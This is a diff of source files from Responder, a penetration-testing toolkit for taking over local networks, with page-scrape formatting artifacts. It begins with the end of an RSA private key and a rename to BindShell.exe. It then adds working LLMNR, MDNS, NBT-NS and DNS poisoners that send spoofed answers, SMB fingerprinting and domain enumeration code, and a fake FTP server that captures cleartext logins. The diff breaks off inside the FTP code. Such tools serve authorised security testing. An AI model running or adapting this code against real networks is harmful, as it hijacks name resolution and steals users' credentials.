AiOEslKIFjjpRhpwMYra6QKBgQDLFO/SY9f2oI/YZff8PMhQhL1qQb7aYeIjlL35
|
||||||
|
HM8e4k10u+RxN06t8d+frcXyjXvrrIjErIvBY/kCjdlXFQGDlbOL0MziQI66mQtf
|
||||||
|
VGPFmbt8vpryfpCKIRJRZpInhFT2r0WKPCGiMQeV0qACOhDjrQC+ApXODF6mJOTm
|
||||||
|
kaWQ5QKBgHE0pD2GAZwqlvKCM5YmBvDpebaBNwpvoY22e2jzyuQF6cmw85eAtp35
|
||||||
|
f92PeuiYyaXuLgL2BR4HSYSjwggxh31JJnRccIxSamATrGOiWnIttDsCB5/WibOp
|
||||||
|
MKuFj26d01imFixufclvZfJxbAvVy4H9hmyjgtycNY+Gp5/CLgDC
|
||||||
|
-----END RSA PRIVATE KEY-----
|
||||||
0
FixInternet.exe → files/BindShell.exe
Executable file → Normal file
0
FixInternet.exe → files/BindShell.exe
Executable file → Normal file
62
fingerprint.py
Normal file
62
fingerprint.py
Normal file
@@ -0,0 +1,62 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
import socket
|
||||||
|
import struct
|
||||||
|
|
||||||
|
from utils import color
|
||||||
|
from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData
|
||||||
|
|
||||||
|
def OsNameClientVersion(data):
|
||||||
|
try:
|
||||||
|
length = struct.unpack('<H',data[43:45])[0]
|
||||||
|
pack = tuple(data[47+length:].split('\x00\x00\x00'))[:2]
|
||||||
|
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
|
||||||
|
return OsVersion, ClientVersion
|
||||||
|
except:
|
||||||
|
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
|
||||||
|
|
||||||
|
def RunSmbFinger(host):
|
||||||
|
try:
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
s.connect(host)
|
||||||
|
s.settimeout(0.7)
|
||||||
|
|
||||||
|
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
|
||||||
|
n = SMBNego(data = SMBNegoFingerData())
|
||||||
|
n.calculate()
|
||||||
|
|
||||||
|
Packet = str(h)+str(n)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
|
||||||
|
s.send(Buffer)
|
||||||
|
data = s.recv(2048)
|
||||||
|
|
||||||
|
if data[8:10] == "\x72\x00":
|
||||||
|
Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
|
||||||
|
Body = SMBSessionFingerData()
|
||||||
|
Body.calculate()
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
|
||||||
|
|
||||||
|
s.send(Buffer)
|
||||||
|
data = s.recv(2048)
|
||||||
|
|
||||||
|
if data[8:10] == "\x73\x16":
|
||||||
|
return OsNameClientVersion(data)
|
||||||
|
except:
|
||||||
|
print color("[!] ", 1, 1) +" Fingerprint failed"
|
||||||
|
return None
|
||||||
11
odict.py
11
odict.py
@@ -1,7 +1,7 @@
|
|||||||
# NBT-NS/LLMNR Responder
|
#!/usr/bin/env python
|
||||||
# Created by Laurent Gaffie
|
# This file is part of Responder, a network take-over set of tools
|
||||||
# Copyright (C) 2014 Trustwave Holdings, Inc.
|
# created and maintained by Laurent Gaffie.
|
||||||
#
|
# email: laurent.gaffie@gmail.com
|
||||||
# This program is free software: you can redistribute it and/or modify
|
# This program is free software: you can redistribute it and/or modify
|
||||||
# it under the terms of the GNU General Public License as published by
|
# it under the terms of the GNU General Public License as published by
|
||||||
# the Free Software Foundation, either version 3 of the License, or
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
@@ -14,7 +14,6 @@
|
|||||||
#
|
#
|
||||||
# You should have received a copy of the GNU General Public License
|
# You should have received a copy of the GNU General Public License
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
|
||||||
from UserDict import DictMixin
|
from UserDict import DictMixin
|
||||||
|
|
||||||
class OrderedDict(dict, DictMixin):
|
class OrderedDict(dict, DictMixin):
|
||||||
@@ -78,7 +77,7 @@ class OrderedDict(dict, DictMixin):
|
|||||||
inst_dict = vars(self).copy()
|
inst_dict = vars(self).copy()
|
||||||
self.__map, self.__end = tmp
|
self.__map, self.__end = tmp
|
||||||
if inst_dict:
|
if inst_dict:
|
||||||
return (self.__class__, (items,), inst_dict)
|
return self.__class__, (items,), inst_dict
|
||||||
return self.__class__, (items,)
|
return self.__class__, (items,)
|
||||||
|
|
||||||
def keys(self):
|
def keys(self):
|
||||||
|
|||||||
1586
packets.py
Normal file
1586
packets.py
Normal file
File diff suppressed because it is too large
Load Diff
74
poisoners/LLMNR.py
Normal file
74
poisoners/LLMNR.py
Normal file
@@ -0,0 +1,74 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
import struct
|
||||||
|
import fingerprint
|
||||||
|
|
||||||
|
from packets import LLMNR_Ans
|
||||||
|
from SocketServer import BaseRequestHandler
|
||||||
|
from utils import *
|
||||||
|
|
||||||
|
|
||||||
|
def Parse_LLMNR_Name(data):
|
||||||
|
NameLen = struct.unpack('>B',data[12])[0]
|
||||||
|
return data[13:13+NameLen]
|
||||||
|
|
||||||
|
|
||||||
|
def IsICMPRedirectPlausible(IP):
|
||||||
|
dnsip = []
|
||||||
|
for line in file('/etc/resolv.conf', 'r'):
|
||||||
|
ip = line.split()
|
||||||
|
if len(ip) < 2:
|
||||||
|
continue
|
||||||
|
elif ip[0] == 'nameserver':
|
||||||
|
dnsip.extend(ip[1:])
|
||||||
|
for x in dnsip:
|
||||||
|
if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False:
|
||||||
|
print color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5)
|
||||||
|
print color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5)
|
||||||
|
print color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5)
|
||||||
|
|
||||||
|
if settings.Config.AnalyzeMode:
|
||||||
|
IsICMPRedirectPlausible(settings.Config.Bind_To)
|
||||||
|
|
||||||
|
|
||||||
|
class LLMNR(BaseRequestHandler): # LLMNR Server class
|
||||||
|
def handle(self):
|
||||||
|
data, soc = self.request
|
||||||
|
Name = Parse_LLMNR_Name(data)
|
||||||
|
|
||||||
|
# Break out if we don't want to respond to this host
|
||||||
|
if RespondToThisHost(self.client_address[0], Name) is not True:
|
||||||
|
return None
|
||||||
|
|
||||||
|
if data[2:4] == "\x00\x00" and Parse_IPV6_Addr(data):
|
||||||
|
Finger = None
|
||||||
|
if settings.Config.Finger_On_Off:
|
||||||
|
Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
|
||||||
|
|
||||||
|
if settings.Config.AnalyzeMode:
|
||||||
|
LineHeader = "[Analyze mode: LLMNR]"
|
||||||
|
print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
|
||||||
|
else: # Poisoning Mode
|
||||||
|
Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
|
||||||
|
Buffer.calculate()
|
||||||
|
soc.sendto(str(Buffer), self.client_address)
|
||||||
|
LineHeader = "[*] [LLMNR]"
|
||||||
|
print color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1)
|
||||||
|
|
||||||
|
if Finger is not None:
|
||||||
|
print text("[FINGER] OS Version : %s" % color(Finger[0], 3))
|
||||||
|
print text("[FINGER] Client Version : %s" % color(Finger[1], 3))
|
||||||
63
poisoners/MDNS.py
Normal file
63
poisoners/MDNS.py
Normal file
@@ -0,0 +1,63 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
import struct
|
||||||
|
|
||||||
|
from SocketServer import BaseRequestHandler
|
||||||
|
from packets import MDNS_Ans
|
||||||
|
from utils import *
|
||||||
|
|
||||||
|
def Parse_MDNS_Name(data):
|
||||||
|
try:
|
||||||
|
data = data[12:]
|
||||||
|
NameLen = struct.unpack('>B',data[0])[0]
|
||||||
|
Name = data[1:1+NameLen]
|
||||||
|
NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
|
||||||
|
Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
|
||||||
|
return Name+'.'+Name_
|
||||||
|
except IndexError:
|
||||||
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
def Poisoned_MDNS_Name(data):
|
||||||
|
data = data[12:]
|
||||||
|
return data[:len(data)-5]
|
||||||
|
|
||||||
|
|
||||||
|
class MDNS(BaseRequestHandler):
|
||||||
|
def handle(self):
|
||||||
|
MADDR = "224.0.0.251"
|
||||||
|
MPORT = 5353
|
||||||
|
|
||||||
|
data, soc = self.request
|
||||||
|
Request_Name = Parse_MDNS_Name(data)
|
||||||
|
|
||||||
|
# Break out if we don't want to respond to this host
|
||||||
|
if (not Request_Name) or (RespondToThisHost(self.client_address[0], Request_Name) is not True):
|
||||||
|
return None
|
||||||
|
|
||||||
|
if settings.Config.AnalyzeMode: # Analyze Mode
|
||||||
|
if Parse_IPV6_Addr(data):
|
||||||
|
print text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3)))
|
||||||
|
else: # Poisoning Mode
|
||||||
|
if Parse_IPV6_Addr(data):
|
||||||
|
|
||||||
|
Poisoned_Name = Poisoned_MDNS_Name(data)
|
||||||
|
Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=socket.inet_aton(settings.Config.Bind_To))
|
||||||
|
Buffer.calculate()
|
||||||
|
soc.sendto(str(Buffer), (MADDR, MPORT))
|
||||||
|
|
||||||
|
print color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1)
|
||||||
67
poisoners/NBTNS.py
Normal file
67
poisoners/NBTNS.py
Normal file
@@ -0,0 +1,67 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
import fingerprint
|
||||||
|
|
||||||
|
from packets import NBT_Ans
|
||||||
|
from SocketServer import BaseRequestHandler
|
||||||
|
from utils import *
|
||||||
|
|
||||||
|
# Define what are we answering to.
|
||||||
|
def Validate_NBT_NS(data):
|
||||||
|
if settings.Config.AnalyzeMode:
|
||||||
|
return False
|
||||||
|
elif NBT_NS_Role(data[43:46]) == "File Server":
|
||||||
|
return True
|
||||||
|
elif settings.Config.NBTNSDomain:
|
||||||
|
if NBT_NS_Role(data[43:46]) == "Domain Controller":
|
||||||
|
return True
|
||||||
|
elif settings.Config.Wredirect:
|
||||||
|
if NBT_NS_Role(data[43:46]) == "Workstation/Redirector":
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
|
||||||
|
# NBT_NS Server class.
|
||||||
|
class NBTNS(BaseRequestHandler):
|
||||||
|
|
||||||
|
def handle(self):
|
||||||
|
|
||||||
|
data, socket = self.request
|
||||||
|
Name = Decode_Name(data[13:45])
|
||||||
|
|
||||||
|
# Break out if we don't want to respond to this host
|
||||||
|
if RespondToThisHost(self.client_address[0], Name) is not True:
|
||||||
|
return None
|
||||||
|
|
||||||
|
if data[2:4] == "\x01\x10":
|
||||||
|
Finger = None
|
||||||
|
if settings.Config.Finger_On_Off:
|
||||||
|
Finger = fingerprint.RunSmbFinger((self.client_address[0],445))
|
||||||
|
|
||||||
|
if settings.Config.AnalyzeMode: # Analyze Mode
|
||||||
|
LineHeader = "[Analyze mode: NBT-NS]"
|
||||||
|
print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
|
||||||
|
else: # Poisoning Mode
|
||||||
|
Buffer = NBT_Ans()
|
||||||
|
Buffer.calculate(data)
|
||||||
|
socket.sendto(str(Buffer), self.client_address)
|
||||||
|
LineHeader = "[*] [NBT-NS]"
|
||||||
|
|
||||||
|
print color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(data[43:46])), 2, 1)
|
||||||
|
|
||||||
|
if Finger is not None:
|
||||||
|
print text("[FINGER] OS Version : %s" % color(Finger[0], 3))
|
||||||
|
print text("[FINGER] Client Version : %s" % color(Finger[1], 3))
|
||||||
0
poisoners/__init__.py
Normal file
0
poisoners/__init__.py
Normal file
197
servers/Browser.py
Normal file
197
servers/Browser.py
Normal file
@@ -0,0 +1,197 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
from packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
|
||||||
|
from SocketServer import BaseRequestHandler
|
||||||
|
from utils import *
|
||||||
|
import struct
|
||||||
|
|
||||||
|
|
||||||
|
def WorkstationFingerPrint(data):
|
||||||
|
return {
|
||||||
|
"\x04\x00" :"Windows 95",
|
||||||
|
"\x04\x10" :"Windows 98",
|
||||||
|
"\x04\x90" :"Windows ME",
|
||||||
|
"\x05\x00" :"Windows 2000",
|
||||||
|
"\x05\x01" :"Windows XP",
|
||||||
|
"\x05\x02" :"Windows XP(64-Bit)/Windows 2003",
|
||||||
|
"\x06\x00" :"Windows Vista/Server 2008",
|
||||||
|
"\x06\x01" :"Windows 7/Server 2008R2",
|
||||||
|
"\x06\x02" :"Windows 8/Server 2012",
|
||||||
|
"\x06\x03" :"Windows 8.1/Server 2012R2",
|
||||||
|
"\x10\x00" :"Windows 10/Server 2016",
|
||||||
|
}.get(data, 'Unknown')
|
||||||
|
|
||||||
|
|
||||||
|
def RequestType(data):
|
||||||
|
return {
|
||||||
|
"\x01": 'Host Announcement',
|
||||||
|
"\x02": 'Request Announcement',
|
||||||
|
"\x08": 'Browser Election',
|
||||||
|
"\x09": 'Get Backup List Request',
|
||||||
|
"\x0a": 'Get Backup List Response',
|
||||||
|
"\x0b": 'Become Backup Browser',
|
||||||
|
"\x0c": 'Domain/Workgroup Announcement',
|
||||||
|
"\x0d": 'Master Announcement',
|
||||||
|
"\x0e": 'Reset Browser State Announcement',
|
||||||
|
"\x0f": 'Local Master Announcement',
|
||||||
|
}.get(data, 'Unknown')
|
||||||
|
|
||||||
|
|
||||||
|
def PrintServerName(data, entries):
|
||||||
|
if entries <= 0:
|
||||||
|
return None
|
||||||
|
entrieslen = 26 * entries
|
||||||
|
chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries
|
||||||
|
ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)]
|
||||||
|
|
||||||
|
l = []
|
||||||
|
for x in ServerName:
|
||||||
|
fingerprint = WorkstationFingerPrint(x[16:18])
|
||||||
|
name = x[:16].replace('\x00', '')
|
||||||
|
l.append('%s (%s)' % (name, fingerprint))
|
||||||
|
return l
|
||||||
|
|
||||||
|
|
||||||
|
def ParsePacket(Payload):
|
||||||
|
PayloadOffset = struct.unpack('<H',Payload[51:53])[0]
|
||||||
|
StatusCode = Payload[PayloadOffset-4:PayloadOffset-2]
|
||||||
|
|
||||||
|
if StatusCode == "\x00\x00":
|
||||||
|
EntriesNum = struct.unpack('<H',Payload[PayloadOffset:PayloadOffset+2])[0]
|
||||||
|
return PrintServerName(Payload[PayloadOffset+4:], EntriesNum)
|
||||||
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
def RAPThisDomain(Client,Domain):
|
||||||
|
PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
|
||||||
|
if PDC is not None:
|
||||||
|
print text("[LANMAN] Detected Domains: %s" % ', '.join(PDC))
|
||||||
|
|
||||||
|
SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
|
||||||
|
if SQL is not None:
|
||||||
|
print text("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL)))
|
||||||
|
|
||||||
|
WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
|
||||||
|
if WKST is not None:
|
||||||
|
print text("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST)))
|
||||||
|
|
||||||
|
|
||||||
|
def RapFinger(Host, Domain, Type):
|
||||||
|
try:
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
s.connect((Host,445))
|
||||||
|
s.settimeout(0.3)
|
||||||
|
|
||||||
|
Header = SMBHeader(cmd="\x72",mid="\x01\x00")
|
||||||
|
Body = SMBNegoData()
|
||||||
|
Body.calculate()
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
|
||||||
|
|
||||||
|
s.send(Buffer)
|
||||||
|
data = s.recv(1024)
|
||||||
|
|
||||||
|
# Session Setup AndX Request, Anonymous.
|
||||||
|
if data[8:10] == "\x72\x00":
|
||||||
|
Header = SMBHeader(cmd="\x73",mid="\x02\x00")
|
||||||
|
Body = SMBSessionData()
|
||||||
|
Body.calculate()
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
|
||||||
|
|
||||||
|
s.send(Buffer)
|
||||||
|
data = s.recv(1024)
|
||||||
|
|
||||||
|
# Tree Connect IPC$.
|
||||||
|
if data[8:10] == "\x73\x00":
|
||||||
|
Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34],mid="\x03\x00")
|
||||||
|
Body = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$")
|
||||||
|
Body.calculate()
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
|
||||||
|
|
||||||
|
s.send(Buffer)
|
||||||
|
data = s.recv(1024)
|
||||||
|
|
||||||
|
# Rap ServerEnum.
|
||||||
|
if data[8:10] == "\x75\x00":
|
||||||
|
Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00")
|
||||||
|
Body = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
|
||||||
|
Body.calculate()
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Body)
|
||||||
|
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
|
||||||
|
|
||||||
|
s.send(Buffer)
|
||||||
|
data = s.recv(64736)
|
||||||
|
|
||||||
|
# Rap ServerEnum, Get answer and return what we're looking for.
|
||||||
|
if data[8:10] == "\x25\x00":
|
||||||
|
s.close()
|
||||||
|
return ParsePacket(data)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
def BecomeBackup(data,Client):
|
||||||
|
try:
|
||||||
|
DataOffset = struct.unpack('<H',data[139:141])[0]
|
||||||
|
BrowserPacket = data[82+DataOffset:]
|
||||||
|
ReqType = RequestType(BrowserPacket[0])
|
||||||
|
|
||||||
|
if ReqType == "Become Backup Browser":
|
||||||
|
ServerName = BrowserPacket[1:]
|
||||||
|
Domain = Decode_Name(data[49:81])
|
||||||
|
Name = Decode_Name(data[15:47])
|
||||||
|
Role = NBT_NS_Role(data[45:48])
|
||||||
|
|
||||||
|
if settings.Config.AnalyzeMode:
|
||||||
|
print text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain))
|
||||||
|
print RAPThisDomain(Client, Domain)
|
||||||
|
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
def ParseDatagramNBTNames(data,Client):
|
||||||
|
try:
|
||||||
|
Domain = Decode_Name(data[49:81])
|
||||||
|
Name = Decode_Name(data[15:47])
|
||||||
|
Role1 = NBT_NS_Role(data[45:48])
|
||||||
|
Role2 = NBT_NS_Role(data[79:82])
|
||||||
|
|
||||||
|
|
||||||
|
if Role2 == "Domain Controller" or Role2 == "Browser Election" or Role2 == "Local Master Browser" and settings.Config.AnalyzeMode:
|
||||||
|
print text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client, Name, Role1, Domain, Role2))
|
||||||
|
print RAPThisDomain(Client, Domain)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
class Browser(BaseRequestHandler):
|
||||||
|
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
request, socket = self.request
|
||||||
|
|
||||||
|
if settings.Config.AnalyzeMode:
|
||||||
|
ParseDatagramNBTNames(request,self.client_address[0])
|
||||||
|
BecomeBackup(request,self.client_address[0])
|
||||||
|
BecomeBackup(request,self.client_address[0])
|
||||||
|
|
||||||
|
except Exception:
|
||||||
|
pass
|
||||||
68
servers/DNS.py
Normal file
68
servers/DNS.py
Normal file
@@ -0,0 +1,68 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
from packets import DNS_Ans
|
||||||
|
from SocketServer import BaseRequestHandler
|
||||||
|
from utils import *
|
||||||
|
|
||||||
|
def ParseDNSType(data):
|
||||||
|
QueryTypeClass = data[len(data)-4:]
|
||||||
|
|
||||||
|
# If Type A, Class IN, then answer.
|
||||||
|
return QueryTypeClass == "\x00\x01\x00\x01"
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
class DNS(BaseRequestHandler):
|
||||||
|
def handle(self):
|
||||||
|
# Break out if we don't want to respond to this host
|
||||||
|
if RespondToThisIP(self.client_address[0]) is not True:
|
||||||
|
return None
|
||||||
|
|
||||||
|
try:
|
||||||
|
data, soc = self.request
|
||||||
|
|
||||||
|
if ParseDNSType(data) and settings.Config.AnalyzeMode == False:
|
||||||
|
buff = DNS_Ans()
|
||||||
|
buff.calculate(data)
|
||||||
|
soc.sendto(str(buff), self.client_address)
|
||||||
|
|
||||||
|
ResolveName = re.sub(r'[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
|
||||||
|
print color("[*] [DNS] Poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1)
|
||||||
|
|
||||||
|
except Exception:
|
||||||
|
pass
|
||||||
|
|
||||||
|
# DNS Server TCP Class
|
||||||
|
class DNSTCP(BaseRequestHandler):
|
||||||
|
def handle(self):
|
||||||
|
# Break out if we don't want to respond to this host
|
||||||
|
if RespondToThisIP(self.client_address[0]) is not True:
|
||||||
|
return None
|
||||||
|
|
||||||
|
try:
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if ParseDNSType(data) and settings.Config.AnalyzeMode is False:
|
||||||
|
buff = DNS_Ans()
|
||||||
|
buff.calculate(data)
|
||||||
|
self.request.send(str(buff))
|
||||||
|
|
||||||
|
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
|
||||||
|
print color("[*] [DNS-TCP] Poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1)
|
||||||
|
|
||||||
|
except Exception:
|
||||||
|
pass
|
||||||
56
servers/FTP.py
Normal file
56
servers/FTP.py
Normal file
@@ -0,0 +1,56 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
from utils import *
|
||||||
|
from SocketServer import BaseRequestHandler
|
||||||
|
from packets import FTPPacket
|
||||||
|
|
||||||
|
class FTP(BaseRequestHandler):
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
self.request.send(str(FTPPacket()))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data[0:4] == "USER":
|
||||||
|
User = data[5:].strip()
|
||||||
|
|
||||||
|
Packet = FTPPacket(Code="331",Message="User name okay, need password.")
|
||||||
|
self.request.send(str(Packet))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data[0:4] == "PASS":
|
||||||
|
Pass = data[5:].strip()
|
||||||
|
|
||||||
|
Packet = FTPPacket(Code="530",Message="User not logged in.")
|
||||||
|
self.request.send(str(Packet))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'FTP',
|
||||||
|
'type': 'Cleartext',
|
||||||
|
'client': self.client_address[0],
|
||||||
|
'user': User,
|
